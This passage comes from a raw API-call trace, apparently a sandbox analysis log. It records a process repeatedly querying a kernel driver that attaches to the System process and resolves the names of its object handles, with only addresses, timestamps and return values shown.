nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x118, lpOverlapped=0x0) returned 1 [0288.644] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.644] PsAcquireProcessExitSynchronization () returned 0x0 [0288.644] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.644] ObReferenceObjectByHandle (in: Handle=0xffffffff800008f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b8c620, HandleInformation=0x0) returned 0x0 [0288.644] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.644] PsReleaseProcessExitSynchronization () returned 0x2 [0288.644] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f87c [0288.644] ObQueryNameString (in: Object=0xffffe00069b8c620, ObjectNameInfo=0xffffe0006a70c7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a70c7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.644] ObfDereferenceObject (Object=0xffffe00069b8c620) returned 0x7fff [0288.644] IoCompleteRequest () returned 0x0 [0288.644] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xce, lpOverlapped=0x0) returned 1 [0288.644] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.644] PsAcquireProcessExitSynchronization () returned 0x0 [0288.644] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.644] ObReferenceObjectByHandle (in: Handle=0xffffffff800008f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b8c790, HandleInformation=0x0) returned 0x0 [0288.644] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.644] PsReleaseProcessExitSynchronization () returned 0x2 [0288.644] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f87b [0288.644] ObQueryNameString (in: Object=0xffffe00069b8c790, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.644] ObfDereferenceObject (Object=0xffffe00069b8c790) returned 0x7fff [0288.644] IoCompleteRequest () returned 0x0 [0288.644] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x118, lpOverlapped=0x0) returned 1 [0288.644] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.644] PsAcquireProcessExitSynchronization () returned 0x0 [0288.644] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.644] ObReferenceObjectByHandle (in: Handle=0xffffffff800008fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069ba79d0, HandleInformation=0x0) returned 0x0 [0288.644] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.645] PsReleaseProcessExitSynchronization () returned 0x2 [0288.645] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f87a [0288.645] ObQueryNameString (in: Object=0xffffe00069ba79d0, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.645] ObfDereferenceObject (Object=0xffffe00069ba79d0) returned 0x7fff [0288.645] IoCompleteRequest () returned 0x0 [0288.645] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.645] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.645] PsAcquireProcessExitSynchronization () returned 0x0 [0288.645] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.645] ObReferenceObjectByHandle (in: Handle=0xffffffff80000904, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069baecd0, HandleInformation=0x0) returned 0x0 [0288.645] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.645] PsReleaseProcessExitSynchronization () returned 0x2 [0288.645] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f879 [0288.645] ObQueryNameString (in: Object=0xffffe00069baecd0, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.645] ObfDereferenceObject (Object=0xffffe00069baecd0) returned 0x7ffe [0288.645] IoCompleteRequest () returned 0x0 [0288.645] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.645] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.645] PsAcquireProcessExitSynchronization () returned 0x0 [0288.645] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.645] ObReferenceObjectByHandle (in: Handle=0xffffffff80000908, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069baea40, HandleInformation=0x0) returned 0x0 [0288.645] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.645] PsReleaseProcessExitSynchronization () returned 0x2 [0288.645] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f878 [0288.645] ObQueryNameString (in: Object=0xffffe00069baea40, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.645] ObfDereferenceObject (Object=0xffffe00069baea40) returned 0x7fff [0288.645] IoCompleteRequest () returned 0x0 [0288.645] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x112, lpOverlapped=0x0) returned 1 [0288.645] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.645] PsAcquireProcessExitSynchronization () returned 0x0 [0288.645] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.645] ObReferenceObjectByHandle (in: Handle=0xffffffff80000914, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bb2600, HandleInformation=0x0) returned 0x0 [0288.645] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.645] PsReleaseProcessExitSynchronization () returned 0x2 [0288.645] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f877 [0288.645] ObQueryNameString (in: Object=0xffffe00069bb2600, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.645] ObfDereferenceObject (Object=0xffffe00069bb2600) returned 0x7fff [0288.645] IoCompleteRequest () returned 0x0 [0288.646] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xb8, lpOverlapped=0x0) returned 1 [0288.646] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.646] PsAcquireProcessExitSynchronization () returned 0x0 [0288.646] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.646] ObReferenceObjectByHandle (in: Handle=0xffffffff80000918, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bb2f20, HandleInformation=0x0) returned 0x0 [0288.646] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.646] PsReleaseProcessExitSynchronization () returned 0x2 [0288.646] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f876 [0288.646] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.646] ObfDereferenceObject (Object=0xffffe00069bb2f20) returned 0x7f1a [0288.646] IoCompleteRequest () returned 0x0 [0288.646] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xc2, lpOverlapped=0x0) returned 1 [0288.646] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.646] PsAcquireProcessExitSynchronization () returned 0x0 [0288.646] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.646] ObReferenceObjectByHandle (in: Handle=0xffffffff8000091c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699fb900, HandleInformation=0x0) returned 0x0 [0288.646] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.646] PsReleaseProcessExitSynchronization () returned 0x2 [0288.646] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f875 [0288.646] ObQueryNameString (in: Object=0xffffe000699fb900, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.646] ObfDereferenceObject (Object=0xffffe000699fb900) returned 0x7ffa [0288.646] IoCompleteRequest () returned 0x0 [0288.646] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xc2, lpOverlapped=0x0) returned 1 [0288.646] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.646] PsAcquireProcessExitSynchronization () returned 0x0 [0288.646] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.646] ObReferenceObjectByHandle (in: Handle=0xffffffff80000920, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069baf690, HandleInformation=0x0) returned 0x0 [0288.646] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.646] PsReleaseProcessExitSynchronization () returned 0x2 [0288.646] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f874 [0288.646] ObQueryNameString (in: Object=0xffffe00069baf690, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.646] ObfDereferenceObject (Object=0xffffe00069baf690) returned 0x7ffd [0288.646] IoCompleteRequest () returned 0x0 [0288.646] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x15c, lpOverlapped=0x0) returned 1 [0288.646] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.646] PsAcquireProcessExitSynchronization () returned 0x0 [0288.646] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.646] ObReferenceObjectByHandle (in: Handle=0xffffffff80000924, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069baff20, HandleInformation=0x0) returned 0x0 [0288.646] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.646] PsReleaseProcessExitSynchronization () returned 0x2 [0288.647] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f873 [0288.647] ObQueryNameString (in: Object=0xffffe00069baff20, ObjectNameInfo=0xffffe0006a65b044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a65b044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.647] ObfDereferenceObject (Object=0xffffe00069baff20) returned 0x7fff [0288.647] IoCompleteRequest () returned 0x0 [0288.647] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x15c, lpOverlapped=0x0) returned 1 [0288.647] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.647] PsAcquireProcessExitSynchronization () returned 0x0 [0288.647] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.647] ObReferenceObjectByHandle (in: Handle=0xffffffff80000928, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006950af20, HandleInformation=0x0) returned 0x0 [0288.647] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.647] PsReleaseProcessExitSynchronization () returned 0x2 [0288.647] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f872 [0288.647] ObQueryNameString (in: Object=0xffffe0006950af20, ObjectNameInfo=0xffffe0006a6fa7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fa7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.647] ObfDereferenceObject (Object=0xffffe0006950af20) returned 0x7fff [0288.647] IoCompleteRequest () returned 0x0 [0288.647] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.647] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.647] PsAcquireProcessExitSynchronization () returned 0x0 [0288.647] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.647] ObReferenceObjectByHandle (in: Handle=0xffffffff80000930, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bb9f20, HandleInformation=0x0) returned 0x0 [0288.647] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.647] PsReleaseProcessExitSynchronization () returned 0x2 [0288.647] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f871 [0288.647] ObQueryNameString (in: Object=0xffffe00069bb9f20, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.647] ObfDereferenceObject (Object=0xffffe00069bb9f20) returned 0x7ffe [0288.647] IoCompleteRequest () returned 0x0 [0288.647] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.647] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.647] PsAcquireProcessExitSynchronization () returned 0x0 [0288.647] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.647] ObReferenceObjectByHandle (in: Handle=0xffffffff80000934, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bb27a0, HandleInformation=0x0) returned 0x0 [0288.647] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.647] PsReleaseProcessExitSynchronization () returned 0x2 [0288.647] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f870 [0288.647] ObQueryNameString (in: Object=0xffffe00069bb27a0, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.647] ObfDereferenceObject (Object=0xffffe00069bb27a0) returned 0x7fff [0288.647] IoCompleteRequest () returned 0x0 [0288.648] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.648] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.648] PsAcquireProcessExitSynchronization () returned 0x0 [0288.648] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.648] ObReferenceObjectByHandle (in: Handle=0xffffffff80000994, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691c6630, HandleInformation=0x0) returned 0x0 [0288.648] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.648] PsReleaseProcessExitSynchronization () returned 0x2 [0288.648] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f86f [0288.648] ObQueryNameString (in: Object=0xffffe000691c6630, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.648] ObfDereferenceObject (Object=0xffffe000691c6630) returned 0x7fff [0288.648] IoCompleteRequest () returned 0x0 [0288.648] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xc0, lpOverlapped=0x0) returned 1 [0288.648] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.648] PsAcquireProcessExitSynchronization () returned 0x0 [0288.648] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.648] ObReferenceObjectByHandle (in: Handle=0xffffffff8000099c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069dbc480, HandleInformation=0x0) returned 0x0 [0288.648] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.648] PsReleaseProcessExitSynchronization () returned 0x2 [0288.648] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f86e [0288.648] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.648] ObfDereferenceObject (Object=0xffffe00069dbc480) returned 0x8018 [0288.648] IoCompleteRequest () returned 0x0 [0288.648] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x2c, lpOverlapped=0x0) returned 1 [0288.648] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.648] PsAcquireProcessExitSynchronization () returned 0x0 [0288.648] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.648] ObReferenceObjectByHandle (in: Handle=0xffffffff800009c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069aebea0, HandleInformation=0x0) returned 0x0 [0288.648] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.648] PsReleaseProcessExitSynchronization () returned 0x2 [0288.648] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f86d [0288.648] ObQueryNameString (in: Object=0xffffe00069aebea0, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.648] ObfDereferenceObject (Object=0xffffe00069aebea0) returned 0x7fff [0288.648] IoCompleteRequest () returned 0x0 [0288.648] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x90, lpOverlapped=0x0) returned 1 [0288.648] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.648] PsAcquireProcessExitSynchronization () returned 0x0 [0288.648] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.648] ObReferenceObjectByHandle (in: Handle=0xffffffff800009c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698fb330, HandleInformation=0x0) returned 0x0 [0288.648] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.648] PsReleaseProcessExitSynchronization () returned 0x2 [0288.648] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f86c [0288.648] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.648] ObfDereferenceObject (Object=0xffffe000698fb330) returned 0x7ffb [0288.649] IoCompleteRequest () returned 0x0 [0288.649] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.649] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.649] PsAcquireProcessExitSynchronization () returned 0x0 [0288.649] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.649] ObReferenceObjectByHandle (in: Handle=0xffffffff800009f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069320910, HandleInformation=0x0) returned 0x0 [0288.649] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.649] PsReleaseProcessExitSynchronization () returned 0x2 [0288.649] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f86b 